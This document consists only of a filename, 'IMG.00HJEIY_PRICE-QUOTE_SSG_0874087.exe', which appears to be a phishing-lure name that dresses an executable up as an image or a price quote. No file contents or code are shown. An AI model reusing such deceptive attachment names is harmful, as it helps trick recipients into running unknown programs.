IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe